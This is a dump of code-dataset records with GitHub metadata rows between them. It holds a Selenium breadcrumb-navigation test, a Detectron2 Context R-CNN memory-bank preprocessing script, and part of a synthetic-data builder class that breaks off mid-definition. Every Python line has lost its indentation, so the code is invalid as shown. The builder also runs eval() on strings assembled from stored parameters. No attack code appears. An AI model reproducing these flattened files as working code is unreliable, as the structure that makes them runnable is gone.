from tests.constants import BREADCRUMB_SEARCH_ID, BREADCRUMB_SELECTED_ID, BREADCRUMB_ENT_ID, BREADCRUMB_LEU_ID
from tests.constants import SEARCH_BUTTON_ID, PERIOD_INPUT_ID, UNIT_TYPE_INPUT_ID
from tests.constants import USERNAME_INPUT_ID, PASSWORD_INPUT_ID, SEARCH_INPUT_ID, LOGIN_BUTTON_ID, LOGOUT_BUTTON_ID
from tests.constants import ERN, UBRN, RURN, LURN, VATREF, PAYEREF, CRN, PERIOD
from tests.constants import ADMIN_USERNAME, ADMIN_PASSWORD
class BreadcrumbTest(unittest.TestCase):
"""
The breadcrumb is present on each unit page and allows navigation up the unit hierarchy.
TODO: test for when a breadcrumb link returns 404/500
"""
def setUp(self):
self.options = create_selenium_config()
self.driver = webdriver.Firefox(firefox_options=self.options)
self.driver.get(BASE_URL)
self.driver.find_element_by_id(USERNAME_INPUT_ID).send_keys(ADMIN_USERNAME)
self.driver.find_element_by_id(PASSWORD_INPUT_ID).send_keys(ADMIN_PASSWORD)
self.driver.find_element_by_id(LOGIN_BUTTON_ID).click()
def tearDown(self):
self.driver.find_element_by_id(LOGOUT_BUTTON_ID).click()
self.driver.quit()
def search_by_unit_id_type_period(self, unit_id, unit_type, period):
self.driver.find_element_by_id(SEARCH_INPUT_ID).send_keys(unit_id)
self.driver.find_element_by_id(UNIT_TYPE_INPUT_ID).send_keys(unit_type)
self.driver.find_element_by_id(PERIOD_INPUT_ID).send_keys(period)
self.driver.find_element_by_id(SEARCH_BUTTON_ID).click()
def assert_breadcrumb_item_text_and_url(self, breadcrumb_id, unit_id, unit_type, period):
breadcrumb_item = self.driver.find_element_by_id(breadcrumb_id)
self.assertEqual(breadcrumb_item.text, f'{unit_type} - {unit_id}')
target_url = f'{SEARCH_URL}/periods/{period}/types/{unit_type}/units/{unit_id}'
self.assertEqual(breadcrumb_item.get_attribute('href'), target_url)
def assert_current_breadcrumb_item_text(self, expected_text):
current_item_text = self.driver.find_element_by_id(BREADCRUMB_SELECTED_ID).text
self.assertEqual(current_item_text, expected_text)
def assert_breadcrumb_search_href(self):
href = self.driver.find_element_by_id(BREADCRUMB_SEARCH_ID).get_attribute('href')
self.assertEqual(href, SEARCH_URL)
def test_ent_breadcrumb(self):
self.search_by_unit_id_type_period(ERN, ENTERPRISE, '201810')
self.assertEqual(self.driver.current_url, f'{SEARCH_URL}/periods/{PERIOD}/types/{ENTERPRISE}/units/{ERN}')
self.assert_breadcrumb_search_href()
self.assert_current_breadcrumb_item_text(f'ENT - {ERN}')
def test_lou_breadcrumb(self):
self.search_by_unit_id_type_period(LURN, LOCAL_UNIT, '201810')
self.assertEqual(self.driver.current_url, f'{SEARCH_URL}/periods/{PERIOD}/types/{LOCAL_UNIT}/units/{LURN}')
self.assert_breadcrumb_search_href()
self.assert_current_breadcrumb_item_text(f'LOU - {LURN}')
self.assert_breadcrumb_item_text_and_url(BREADCRUMB_ENT_ID, ERN, ENTERPRISE, PERIOD)
def test_reu_breadcrumb(self):
self.search_by_unit_id_type_period(RURN, REPORTING_UNIT, '201810')
self.assertEqual(self.driver.current_url, f'{SEARCH_URL}/periods/{PERIOD}/types/{REPORTING_UNIT}/units/{RURN}')
self.assert_breadcrumb_search_href()
self.assert_current_breadcrumb_item_text(f'REU - {RURN}')
self.assert_breadcrumb_item_text_and_url(BREADCRUMB_ENT_ID, ERN, ENTERPRISE, PERIOD)
def test_leu_breadcrumb(self):
self.search_by_unit_id_type_period(UBRN, LEGAL_UNIT, '201810')
self.assertEqual(self.driver.current_url, f'{SEARCH_URL}/periods/{PERIOD}/types/{LEGAL_UNIT}/units/{UBRN}')
self.assert_breadcrumb_search_href()
self.assert_current_breadcrumb_item_text(f'LEU - {UBRN}')
self.assert_breadcrumb_item_text_and_url(BREADCRUMB_ENT_ID, ERN, ENTERPRISE, PERIOD)
def test_ch_breadcrumb(self):
self.search_by_unit_id_type_period(CRN, COMPANY_HOUSE, '201810')
self.assertEqual(self.driver.current_url, f'{SEARCH_URL}/periods/{PERIOD}/types/{COMPANY_HOUSE}/units/{CRN}')
self.assert_breadcrumb_search_href()
self.assert_current_breadcrumb_item_text(f'CRN - {CRN}')
self.assert_breadcrumb_item_text_and_url(BREADCRUMB_ENT_ID, ERN, ENTERPRISE, PERIOD)
self.assert_breadcrumb_item_text_and_url(BREADCRUMB_LEU_ID, UBRN, LEGAL_UNIT, PERIOD)
def test_vat_breadcrumb(self):
self.search_by_unit_id_type_period(VATREF, VALUE_ADDED_TAX, '201810')
self.assertEqual(self.driver.current_url, f'{SEARCH_URL}/periods/{PERIOD}/types/{VALUE_ADDED_TAX}/units/{VATREF}')
self.assert_breadcrumb_search_href()
self.assert_current_breadcrumb_item_text(f'VAT - {VATREF}')
self.assert_breadcrumb_item_text_and_url(BREADCRUMB_ENT_ID, ERN, ENTERPRISE, PERIOD)
self.assert_breadcrumb_item_text_and_url(BREADCRUMB_LEU_ID, UBRN, LEGAL_UNIT, PERIOD)
def test_paye_breadcrumb(self):
self.search_by_unit_id_type_period(PAYEREF, PAY_AS_YOU_EARN, '201810')
self.assertEqual(self.driver.current_url, f'{SEARCH_URL}/periods/{PERIOD}/types/{PAY_AS_YOU_EARN}/units/{PAYEREF}')
self.assert_breadcrumb_search_href()
self.assert_current_breadcrumb_item_text(f'PAYE - {PAYEREF}')
self.assert_breadcrumb_item_text_and_url(BREADCRUMB_ENT_ID, ERN, ENTERPRISE, PERIOD)
self.assert_breadcrumb_item_text_and_url(BREADCRUMB_LEU_ID, UBRN, LEGAL_UNIT, PERIOD)
if __name__ == '__main__':
unittest.main()
|
[
"noreply@github.com"
] |
uk-gov-mirror.noreply@github.com
|
bd05dc4876b69bf2451ecc467039d32ee79a19ed
|
0862376b2318c42efa3498dda41c73ecbdbf2ac3
|
/scripts/preprocess.py
|
54077b0a7f0cb04a4a1eee90e1322e2d46f140c6
|
[] |
no_license
|
njkbarry/context-rcnn-d2
|
96e2f9a0dbbe4a2b54bce403e5f4d0054aa46509
|
c3e1f6b208962334763c3364dc107387a2bc3e94
|
refs/heads/main
| 2023-04-06T17:02:13.536520
| 2021-04-06T18:03:56
| 2021-04-06T18:03:56
| null | 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 3,024
|
py
|
import argparse
import os
import torch.multiprocessing as mp
from detectron2.config import get_cfg
from detectron2.engine import default_setup
from context_rcnn.config import add_context_rcnn_config
from context_rcnn.preprocess import build_banks, build_one_bank
# relative to models-dir
_MODELS = {
# 1-class model
"frcnn-r101-cct": {
"weights": "pretrained/cct-animal-frcnn-r101/model_final_wo_solver_states.pth",
"config": "pretrained/cct-animal-frcnn-r101/config.yaml"
},
# toy model undertrained on just toy1924-species
"toy-fpn": {
"weights": "toy1924-multi-18epoch-fpn/model_final.pth",
"config": "toy1924-multi-18epoch-fpn/config.yaml"
},
# toy model undertrained on just toy1924-species
"toy-c4": {
"weights": "toy1924-multi-18epoch-c4/model_final.pth",
"config": "toy1924-multi-18epoch-c4/config.yaml"
},
}
def get_cfg_for_inference(model_name, models_dir, score_threshold=0.0, nms_threshold=0.5):
weights = os.path.join(models_dir, _MODELS[model_name]["weights"])
config = os.path.join(models_dir, _MODELS[model_name]["config"])
cfg = get_cfg()
add_context_rcnn_config(cfg)
cfg.merge_from_file(config)
cfg.MODEL.WEIGHTS = weights
cfg.MODEL.ROI_HEADS.SCORE_THRESH_TEST = score_threshold
cfg.MODEL.ROI_HEADS.NMS_THRESH_TEST = nms_threshold
return cfg
def preprocess_argument_parser():
parser = argparse.ArgumentParser()
parser.add_argument("--model", default="frcnn-r101-cct", help="Name of model to use for inference. See _MODELS")
parser.add_argument("--dataset", default="cct", help="Name of dataset to generate banks for, { 'cct' }")
parser.add_argument("--banks-dir", default="./banks", metavar="FILE", help="Location of memory banks for Context R-CNN")
parser.add_argument("--data-dir", default="../data", metavar="FILE", help="Path to data/")
parser.add_argument("--models-dir", default="../models", metavar="FILE", help="Path to models/")
parser.add_argument("--num-gpus", type=int, default=1)
parser.add_argument("--only", default=None, help="only do the specified bank")
return parser
def build_banks_with_process(gpu_idx, cfg, dataset_name, data_dir, bank_dir, num_gpus):
"""Same as context_rcnn.preprocess but ignores process ID from torch multiprocessing."""
cfg = cfg.clone()
cfg.MODEL.DEVICE = "cuda:{}".format(gpu_idx)
default_setup(cfg, {})
print("Launching process on GPU", gpu_idx)
build_banks(cfg, dataset_name, data_dir, bank_dir, gpu_idx, num_gpus)
if __name__ == "__main__":
args = preprocess_argument_parser().parse_args()
cfg = get_cfg_for_inference(args.model, args.models_dir)
if args.only:
build_one_bank(cfg, args.dataset, args.data_dir, args.banks_dir, args.only, in_train=True)
else:
mp.spawn(build_banks_with_process, args=(cfg, args.dataset, args.data_dir, args.banks_dir, args.num_gpus),
nprocs=args.num_gpus)
|
[
"justinkay92@gmail.com"
] |
justinkay92@gmail.com
|
4e5e39b356cbb7a91503ee349dcc94df9ee9b50b
|
d6dfbd6251ee3f75d0f304930b406d8504f52f9d
|
/ds_discovery/intent/abstract_builder_intent.py
|
d1c46ba84752536a1d383292b0e10a73abbc1299
|
[
"BSD-3-Clause"
] |
permissive
|
bpandey-CS/discovery-transition-ds
|
974fd5e4bd99ec0993ffe23530e17413ba50c59a
|
08229ca3b7617b42ce2dd8e47ff93876c0843810
|
refs/heads/master
| 2023-05-31T03:20:07.185204
| 2021-06-29T16:35:59
| 2021-06-29T16:35:59
| null | 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 131,319
|
py
|
import ast
import time
import numpy as np
import pandas as pd
from copy import deepcopy
from typing import Any
from matplotlib import dates as mdates
from scipy import stats
from aistac.components.aistac_commons import DataAnalytics
from ds_discovery.components.transitioning import Transition
from ds_discovery.components.commons import Commons
from aistac.properties.abstract_properties import AbstractPropertyManager
from ds_discovery.components.discovery import DataDiscovery
from ds_discovery.intent.abstract_common_intent import AbstractCommonsIntentModel
__author__ = 'Darryl Oatridge'
class AbstractBuilderIntentModel(AbstractCommonsIntentModel):
_INTENT_PARAMS = ['self', 'save_intent', 'column_name', 'intent_order',
'replace_intent', 'remove_duplicates', 'seed']
def __init__(self, property_manager: AbstractPropertyManager, default_save_intent: bool=None,
default_intent_level: [str, int, float]=None, default_intent_order: int=None,
default_replace_intent: bool=None):
"""initialisation of the Intent class.
:param property_manager: the property manager class that references the intent contract.
:param default_save_intent: (optional) The default action for saving intent in the property manager
:param default_intent_level: (optional) the default level intent should be saved at
:param default_intent_order: (optional) if the default behaviour for the order should be next available order
:param default_replace_intent: (optional) the default replace existing intent behaviour
"""
default_save_intent = default_save_intent if isinstance(default_save_intent, bool) else True
default_replace_intent = default_replace_intent if isinstance(default_replace_intent, bool) else True
default_intent_level = default_intent_level if isinstance(default_intent_level, (str, int, float)) else 'A'
default_intent_order = default_intent_order if isinstance(default_intent_order, int) else 0
intent_param_exclude = ['size']
intent_type_additions = [np.int8, np.int16, np.int32, np.int64, np.float32, np.float64, pd.Timestamp]
super().__init__(property_manager=property_manager, default_save_intent=default_save_intent,
intent_param_exclude=intent_param_exclude, default_intent_level=default_intent_level,
default_intent_order=default_intent_order, default_replace_intent=default_replace_intent,
intent_type_additions=intent_type_additions)
def run_intent_pipeline(self, canonical: Any=None, intent_levels: [str, int, list]=None, run_book: str=None,
seed: int=None, simulate: bool=None, **kwargs) -> pd.DataFrame:
"""Collectively runs all parameterised intent taken from the property manager against the code base as
defined by the intent_contract. The whole run can be seeded though any parameterised seeding in the intent
contracts will take precedence
:param canonical: a direct or generated pd.DataFrame. see context notes below
:param intent_levels: (optional) a single or list of intent_level to run in order given
:param run_book: (optional) a preset runbook of intent_level to run in order
:param seed: (optional) a seed value that will be applied across the run: default to None
:param simulate: (optional) returns a report of the order of run and return the indexed column order of run
:return: a pandas dataframe
"""
simulate = simulate if isinstance(simulate, bool) else False
col_sim = {"column": [], "order": [], "method": []}
# legacy
if 'size' in kwargs.keys():
canonical = kwargs.pop('size')
canonical = self._get_canonical(canonical)
size = canonical.shape[0] if canonical.shape[0] > 0 else 1000
# test if there is any intent to run
if self._pm.has_intent():
# get the list of levels to run
if isinstance(intent_levels, (str, list)):
column_names = Commons.list_formatter(intent_levels)
elif isinstance(run_book, str) and self._pm.has_run_book(book_name=run_book):
column_names = self._pm.get_run_book(book_name=run_book)
else:
# put all the intent in order of model, get, correlate, associate
_model = []
_get = []
_correlate = []
_frame_start = []
_frame_end = []
for column in self._pm.get_intent().keys():
for order in self._pm.get(self._pm.join(self._pm.KEY.intent_key, column), {}):
for method in self._pm.get(self._pm.join(self._pm.KEY.intent_key, column, order), {}).keys():
if str(method).startswith('get_'):
if column in _correlate + _frame_start + _frame_end:
continue
_get.append(column)
elif str(method).startswith('model_'):
_model.append(column)
elif str(method).startswith('correlate_'):
if column in _get:
_get.remove(column)
_correlate.append(column)
elif str(method).startswith('frame_'):
if column in _get:
_get.remove(column)
if str(method).startswith('frame_starter'):
_frame_start.append(column)
else:
_frame_end.append(column)
column_names = Commons.list_unique(_frame_start + _get + _model + _correlate + _frame_end)
for column in column_names:
level_key = self._pm.join(self._pm.KEY.intent_key, column)
for order in sorted(self._pm.get(level_key, {})):
for method, params in self._pm.get(self._pm.join(level_key, order), {}).items():
try:
if method in self.__dir__():
if simulate:
col_sim['column'].append(column)
col_sim['order'].append(order)
col_sim['method'].append(method)
continue
result = []
params.update(params.pop('kwargs', {}))
if isinstance(seed, int):
params.update({'seed': seed})
_ = params.pop('intent_creator', 'Unknown')
if str(method).startswith('get_'):
result = eval(f"self.{method}(size=size, save_intent=False, **params)",
globals(), locals())
elif str(method).startswith('correlate_'):
result = eval(f"self.{method}(canonical=canonical, save_intent=False, **params)",
globals(), locals())
elif str(method).startswith('model_'):
canonical = eval(f"self.{method}(canonical=canonical, save_intent=False, **params)",
globals(), locals())
continue
elif str(method).startswith('frame_starter'):
canonical = self._get_canonical(params.pop('canonical', canonical), deep_copy=False)
size = canonical.shape[0]
canonical = eval(f"self.{method}(canonical=canonical, save_intent=False, **params)",
globals(), locals())
continue
elif str(method).startswith('frame_'):
canonical = eval(f"self.{method}(canonical=canonical, save_intent=False, **params)",
globals(), locals())
continue
if 0 < size != len(result):
raise IndexError(f"The index size of '{column}' is '{len(result)}', "
f"should be {size}")
canonical[column] = result
except ValueError as ve:
raise ValueError(f"intent '{column}', order '{order}', method '{method}' failed with: {ve}")
except TypeError as te:
raise TypeError(f"intent '{column}', order '{order}', method '{method}' failed with: {te}")
if simulate:
return pd.DataFrame.from_dict(col_sim)
return canonical
def _get_number(self, from_value: [int, float]=None, to_value: [int, float]=None, relative_freq: list=None,
precision: int=None, ordered: str=None, at_most: int=None, size: int=None,
seed: int=None) -> list:
""" returns a number in the range from_value to to_value. if only to_value given from_value is zero
:param from_value: (signed) integer to start from
:param to_value: optional, (signed) integer the number sequence goes to but not include
:param relative_freq: a weighting pattern or probability that does not have to add to 1
:param precision: the precision of the returned number. if None then assumes int value else float
:param ordered: order the data ascending 'asc' or descending 'dec', values accepted 'asc' or 'des'
:param at_most: the most times a selection should be chosen
:param size: the size of the sample
:param seed: a seed value for the random function: default to None
"""
if not isinstance(from_value, (int, float)) and not isinstance(to_value, (int, float)):
raise ValueError(f"either a 'range_value' or a 'range_value' and 'to_value' must be provided")
if not isinstance(from_value, (float, int)):
from_value = 0
if not isinstance(to_value, (float, int)):
(from_value, to_value) = (0, from_value)
if to_value <= from_value:
raise ValueError("The number range must be a positive different, found to_value <= from_value")
at_most = 0 if not isinstance(at_most, int) else at_most
size = 1 if size is None else size
_seed = self._seed() if seed is None else seed
precision = 3 if not isinstance(precision, int) else precision
if precision == 0:
from_value = int(round(from_value, 0))
to_value = int(round(to_value, 0))
is_int = True if (isinstance(to_value, int) and isinstance(from_value, int)) else False
if is_int:
precision = 0
# build the distribution sizes
if isinstance(relative_freq, list) and len(relative_freq) > 1:
freq_dist_size = self._freq_dist_size(relative_freq=relative_freq, size=size, seed=_seed)
else:
freq_dist_size = [size]
# generate the numbers
rtn_list = []
generator = np.random.default_rng(seed=_seed)
dtype = int if is_int else float
bins = np.linspace(from_value, to_value, len(freq_dist_size) + 1, dtype=dtype)
for idx in np.arange(1, len(bins)):
low = bins[idx - 1]
high = bins[idx]
if low >= high:
continue
elif at_most > 0:
sample = []
for _ in np.arange(at_most, dtype=dtype):
count_size = freq_dist_size[idx - 1] * generator.integers(2, 4, size=1)[0]
sample += list(set(np.linspace(bins[idx - 1], bins[idx], num=count_size, dtype=dtype,
endpoint=False)))
if len(sample) < freq_dist_size[idx - 1]:
raise ValueError(f"The value range has insufficient samples to choose from when using at_most."
f"Try increasing the range of values to sample.")
rtn_list += list(generator.choice(sample, size=freq_dist_size[idx - 1], replace=False))
else:
if dtype == int:
rtn_list += generator.integers(low=low, high=high, size=freq_dist_size[idx - 1]).tolist()
else:
choice = generator.random(size=freq_dist_size[idx - 1], dtype=float)
choice = np.round(choice * (high-low)+low, precision).tolist()
# make sure the precision
choice = [high - 10**(-precision) if x >= high else x for x in choice]
rtn_list += choice
# order or shuffle the return list
if isinstance(ordered, str) and ordered.lower() in ['asc', 'des']:
rtn_list.sort(reverse=True if ordered.lower() == 'asc' else False)
else:
generator.shuffle(rtn_list)
return rtn_list
def _get_category(self, selection: list, relative_freq: list=None, size: int=None, at_most: int=None,
seed: int=None) -> list:
""" returns a category from a list. Of particular not is the at_least parameter that allows you to
control the number of times a selection can be chosen.
:param selection: a list of items to select from
:param relative_freq: a weighting pattern that does not have to add to 1
:param size: an optional size of the return. default to 1
:param at_most: the most times a selection should be chosen
:param seed: a seed value for the random function: default to None
:return: an item or list of items chosen from the list
"""
if not isinstance(selection, list) or len(selection) == 0:
return [None]*size
_seed = self._seed() if seed is None else seed
select_index = self._get_number(len(selection), relative_freq=relative_freq, at_most=at_most, size=size,
seed=_seed)
rtn_list = [selection[i] for i in select_index]
return list(rtn_list)
def _get_datetime(self, start: Any, until: Any, relative_freq: list=None, at_most: int=None, ordered: str=None,
date_format: str=None, as_num: bool=None, ignore_time: bool=None, size: int=None,
seed: int=None, day_first: bool=None, year_first: bool=None) -> list:
""" returns a random date between two date and/or times. weighted patterns can be applied to the overall date
range.
if a signed 'int' type is passed to the start and/or until dates, the inferred date will be the current date
time with the integer being the offset from the current date time in 'days'.
if a dictionary of time delta name values is passed this is treated as a time delta from the start time.
for example if start = 0, until = {days=1, hours=3} the date range will be between now and 1 days and 3 hours
Note: If no patterns are set this will return a linearly random number between the range boundaries.
:param start: the start boundary of the date range can be str, datetime, pd.datetime, pd.Timestamp or int
:param until: up until boundary of the date range can be str, datetime, pd.datetime, pd.Timestamp, pd.delta, int
:param relative_freq: (optional) A pattern across the whole date range.
:param at_most: the most times a selection should be chosen
:param ordered: order the data ascending 'asc' or descending 'dec', values accepted 'asc' or 'des'
:param ignore_time: ignore time elements and only select from Year, Month, Day elements. Default is False
:param date_format: the string format of the date to be returned. if not set then pd.Timestamp returned
:param as_num: returns a list of Matplotlib date values as a float. Default is False
:param size: the size of the sample to return. Default to 1
:param seed: a seed value for the random function: default to None
:param year_first: specifies if to parse with the year first
If True parses dates with the year first, eg 10/11/12 is parsed as 2010-11-12.
If both dayfirst and yearfirst are True, yearfirst is preceded (same as dateutil).
:param day_first: specifies if to parse with the day first
If True, parses dates with the day first, eg %d-%m-%Y.
If False default to the a preferred preference, normally %m-%d-%Y (but not strict)
:return: a date or size of dates in the format given.
"""
# pre check
if start is None or until is None:
raise ValueError("The start or until parameters cannot be of NoneType")
# Code block for intent
as_num = False if not isinstance(as_num, bool) else as_num
ignore_time = False if not isinstance(ignore_time, bool) else ignore_time
size = 1 if size is None else size
_seed = self._seed() if seed is None else seed
if isinstance(start, int):
start = (pd.Timestamp.now() + pd.Timedelta(days=start))
if isinstance(until, int):
until = (pd.Timestamp.now() + pd.Timedelta(days=until))
if isinstance(until, dict):
until = (start + pd.Timedelta(**until))
if start == until:
rtn_list = [self._convert_date2value(start, day_first=day_first, year_first=year_first)[0]] * size
else:
_dt_start = self._convert_date2value(start, day_first=day_first, year_first=year_first)[0]
_dt_until = self._convert_date2value(until, day_first=day_first, year_first=year_first)[0]
precision = 15
if ignore_time:
_dt_start = int(_dt_start)
_dt_until = int(_dt_until)
precision = 0
rtn_list = self._get_number(from_value=_dt_start, to_value=_dt_until, relative_freq=relative_freq,
at_most=at_most, ordered=ordered, precision=precision, size=size, seed=seed)
if not as_num:
rtn_list = mdates.num2date(rtn_list)
if isinstance(date_format, str):
rtn_list = pd.Series(rtn_list).dt.strftime(date_format).to_list()
else:
rtn_list = pd.Series(rtn_list).dt.tz_convert(None).to_list()
return rtn_list
def _get_intervals(self, intervals: list, relative_freq: list=None, precision: int=None, size: int=None,
seed: int=None) -> list:
""" returns a number based on a list selection of tuple(lower, upper) interval
:param intervals: a list of unique tuple pairs representing the interval lower and upper boundaries
:param relative_freq: a weighting pattern or probability that does not have to add to 1
:param precision: the precision of the returned number. if None then assumes int value else float
:param size: the size of the sample
:param seed: a seed value for the random function: default to None
:return: a random number
"""
# Code block for intent
size = 1 if size is None else size
if not isinstance(precision, int):
precision = 0 if all(isinstance(v[0], int) and isinstance(v[1], int) for v in intervals) else 3
_seed = self._seed() if seed is None else seed
if not all(isinstance(value, tuple) for value in intervals):
raise ValueError("The intervals list must be a list of tuples")
interval_list = self._get_category(selection=intervals, relative_freq=relative_freq, size=size, seed=_seed)
interval_counts = pd.Series(interval_list, dtype='object').value_counts()
rtn_list = []
for index in interval_counts.index:
size = interval_counts[index]
if size == 0:
continue
if len(index) == 2:
(lower, upper) = index
if index == 0:
closed = 'both'
else:
closed = 'right'
else:
(lower, upper, closed) = index
if lower == upper:
rtn_list += [round(lower, precision)] * size
continue
if precision == 0:
margin = 1
else:
margin = 10**(((-1)*precision)-1)
if str.lower(closed) == 'neither':
lower += margin
upper -= margin
elif str.lower(closed) == 'right':
lower += margin
elif str.lower(closed) == 'both':
upper += margin
# correct adjustments
if lower >= upper:
upper = lower + margin
rtn_list += self._get_number(lower, upper, precision=precision, size=size, seed=_seed)
np.random.default_rng(seed=_seed).shuffle(rtn_list)
return rtn_list
def _get_dist_normal(self, mean: float, std: float, size: int=None, seed: int=None) -> list:
"""A normal (Gaussian) continuous random distribution.
:param mean: The mean (“centre”) of the distribution.
:param std: The standard deviation (jitter or “width”) of the distribution. Must be >= 0
:param size: the size of the sample. if a tuple of intervals, size must match the tuple
:param seed: a seed value for the random function: default to None
:return: a random number
"""
size = 1 if size is None else size
_seed = self._seed() if seed is None else seed
generator = np.random.default_rng(seed=_seed)
rtn_list = list(generator.normal(loc=mean, scale=std, size=size))
return rtn_list
def _get_dist_logistic(self, mean: float, std: float, size: int=None, seed: int=None) -> list:
"""A logistic continuous random distribution.
:param mean: The mean (“centre”) of the distribution.
:param std: The standard deviation (jitter or “width”) of the distribution. Must be >= 0
:param size: the size of the sample. if a tuple of intervals, size must match the tuple
:param seed: a seed value for the random function: default to None
:return: a random number
"""
size = 1 if size is None else size
_seed = self._seed() if seed is None else seed
generator = np.random.default_rng(seed=_seed)
rtn_list = list(generator.logistic(loc=mean, scale=std, size=size))
return rtn_list
def _get_dist_exponential(self, scale: [int, float], size: int=None, seed: int=None) -> list:
"""An exponential continuous random distribution.
:param scale: The scale of the distribution.
:param size: the size of the sample. if a tuple of intervals, size must match the tuple
:param seed: a seed value for the random function: default to None
:return: a random number
"""
size = 1 if size is None else size
_seed = self._seed() if seed is None else seed
generator = np.random.default_rng(seed=_seed)
rtn_list = list(generator.exponential(scale=scale, size=size))
return rtn_list
def _get_dist_gumbel(self, mean: float, std: float, size: int=None, seed: int=None) -> list:
"""An gumbel continuous random distribution.
The Gumbel (or Smallest Extreme Value (SEV) or the Smallest Extreme Value Type I) distribution is one of
a class of Generalized Extreme Value (GEV) distributions used in modeling extreme value problems.
The Gumbel is a special case of the Extreme Value Type I distribution for maximums from distributions
with “exponential-like” tails.
:param mean: The mean (“centre”) of the distribution.
:param std: The standard deviation (jitter or “width”) of the distribution. Must be >= 0
:param size: the size of the sample. if a tuple of intervals, size must match the tuple
:param seed: a seed value for the random function: default to None
:return: a random number
"""
size = 1 if size is None else size
_seed = self._seed() if seed is None else seed
generator = np.random.default_rng(seed=_seed)
rtn_list = list(generator.gumbel(loc=mean, scale=std, size=size))
return rtn_list
def _get_dist_binomial(self, trials: int, probability: float, size: int=None, seed: int=None) -> list:
"""A binomial discrete random distribution. The Binomial Distribution represents the number of
successes and failures in n independent Bernoulli trials for some given value of n
:param trials: the number of trials to attempt, must be >= 0.
:param probability: the probability distribution, >= 0 and <=1.
:param size: the size of the sample. if a tuple of intervals, size must match the tuple
:param seed: a seed value for the random function: default to None
:return: a random number
"""
size = 1 if size is None else size
_seed = self._seed() if seed is None else seed
generator = np.random.default_rng(seed=_seed)
rtn_list = list(generator.binomial(n=trials, p=probability, size=size))
return rtn_list
def _get_dist_poisson(self, interval: float, size: int=None, seed: int=None) -> list:
"""A Poisson discrete random distribution.
The Poisson distribution
.. math:: f(k; \lambda)=\frac{\lambda^k e^{-\lambda}}{k!}
For events with an expected separation :math:`\lambda` the Poisson
distribution :math:`f(k; \lambda)` describes the probability of
:math:`k` events occurring within the observed
interval :math:`\lambda`.
Because the output is limited to the range of the C int64 type, a
ValueError is raised when `lam` is within 10 sigma of the maximum
representable value.
:param interval: Expectation of interval, must be >= 0.
:param size: the size of the sample.
:param seed: a seed value for the random function: default to None
:return: a random number
"""
size = 1 if size is None else size
_seed = self._seed() if seed is None else seed
generator = np.random.default_rng(seed=_seed)
rtn_list = list(generator.poisson(lam=interval, size=size))
return rtn_list
def _get_dist_bernoulli(self, probability: float, size: int=None, seed: int=None) -> list:
"""A Bernoulli discrete random distribution using scipy
:param probability: the probability occurrence
:param size: the size of the sample
:param seed: a seed value for the random function: default to None
:return: a random number
"""
size = 1 if size is None else size
_seed = self._seed() if seed is None else seed
rtn_list = list(stats.bernoulli.rvs(p=probability, size=size, random_state=_seed))
return rtn_list
def _get_dist_bounded_normal(self, mean: float, std: float, lower: float, upper: float, precision: int=None,
size: int=None, seed: int=None) -> list:
"""A bounded normal continuous random distribution.
:param mean: the mean of the distribution
:param std: the standard deviation
:param lower: the lower limit of the distribution
:param upper: the upper limit of the distribution
:param precision: the precision of the returned number. if None then assumes int value else float
:param size: the size of the sample
:param seed: a seed value for the random function: default to None
:return: a random number
"""
size = 1 if size is None else size
precision = precision if isinstance(precision, int) else 3
_seed = self._seed() if seed is None else seed
rtn_list = stats.truncnorm((lower-mean)/std, (upper-mean)/std, loc=mean, scale=std).rvs(size).round(precision)
return rtn_list
def _get_distribution(self, distribution: str, package: str=None, precision: int=None, size: int=None,
seed: int=None, **kwargs) -> list:
"""returns a number based the distribution type.
:param distribution: The string name of the distribution function from numpy random Generator class
:param package: (optional) The name of the package to use, options are 'numpy' (default) and 'scipy'.
:param precision: (optional) the precision of the returned number
:param size: (optional) the size of the sample
:param seed: (optional) a seed value for the random function: default to None
:return: a random number
"""
size = 1 if size is None else size
_seed = self._seed() if seed is None else seed
precision = 3 if precision is None else precision
if isinstance(package, str) and package == 'scipy':
rtn_list = eval(f"stats.{distribution}.rvs(size=size, random_state=_seed, **kwargs)", globals(), locals())
else:
generator = np.random.default_rng(seed=_seed)
rtn_list = eval(f"generator.{distribution}(size=size, **kwargs)", globals(), locals())
rtn_list = list(rtn_list.round(precision))
return rtn_list
def _get_selection(self, canonical: Any, column_header: str, relative_freq: list=None, sample_size: int=None,
selection_size: int=None, size: int=None, at_most: bool=None, shuffle: bool=None,
seed: int=None) -> list:
""" returns a random list of values where the selection of those values is taken from a connector source.
:param canonical: a pd.DataFrame as the reference dataframe
:param column_header: the name of the column header to correlate
:param relative_freq: (optional) a weighting pattern of the final selection
:param selection_size: (optional) the selection to take from the sample size, normally used with shuffle
:param sample_size: (optional) the size of the sample to take from the reference file
:param at_most: (optional) the most times a selection should be chosen
:param shuffle: (optional) if the selection should be shuffled before selection. Default is true
:param size: (optional) size of the return. default to 1
:param seed: (optional) a seed value for the random function: default to None
:return: list
The canonical is normally a connector contract str reference or a set of parameter instructions on how to
generate a pd.Dataframe but can be a pd.DataFrame. the description of each is:
- pd.Dataframe -> a deep copy of the pd.DataFrame
- pd.Series or list -> creates a pd.DataFrame of one column with the 'header' name or 'default' if not given
- str -> instantiates a connector handler with the connector_name and loads the DataFrame from the connection
- int -> generates an empty pd.Dataframe with an index size of the int passed.
- dict -> use canonical2dict(...) to help construct a dict with a 'method' to build a pd.DataFrame
methods:
- model_*(...) -> one of the SyntheticBuilder model methods and parameters
- @empty -> generates an empty pd.DataFrame where size and headers can be passed
:size sets the index size of the dataframe
:headers any initial headers for the dataframe
- @generate -> generate a synthetic file from a remote Domain Contract
:task_name the name of the SyntheticBuilder task to run
:repo_uri the location of the Domain Product
:size (optional) a size to generate
:seed (optional) if a seed should be applied
:run_book (optional) if specific intent should be run only
"""
canonical = self._get_canonical(canonical)
_seed = self._seed() if seed is None else seed
if isinstance(canonical, dict):
canonical = pd.DataFrame.from_dict(data=canonical)
if column_header not in canonical.columns:
raise ValueError(f"The column '{column_header}' not found in the canonical")
_values = canonical[column_header].iloc[:sample_size]
if isinstance(selection_size, float) and shuffle:
_values = _values.sample(frac=1, random_state=_seed).reset_index(drop=True)
if isinstance(selection_size, int) and 0 < selection_size < _values.size:
_values = _values.iloc[:selection_size]
return self._get_category(selection=_values.to_list(), relative_freq=relative_freq, size=size, at_most=at_most,
seed=_seed)
def _frame_starter(self, canonical: Any, selection: list=None, headers: [str, list]=None, drop: bool=None,
dtype: [str, list]=None, exclude: bool=None, regex: [str, list]=None, re_ignore_case: bool=None,
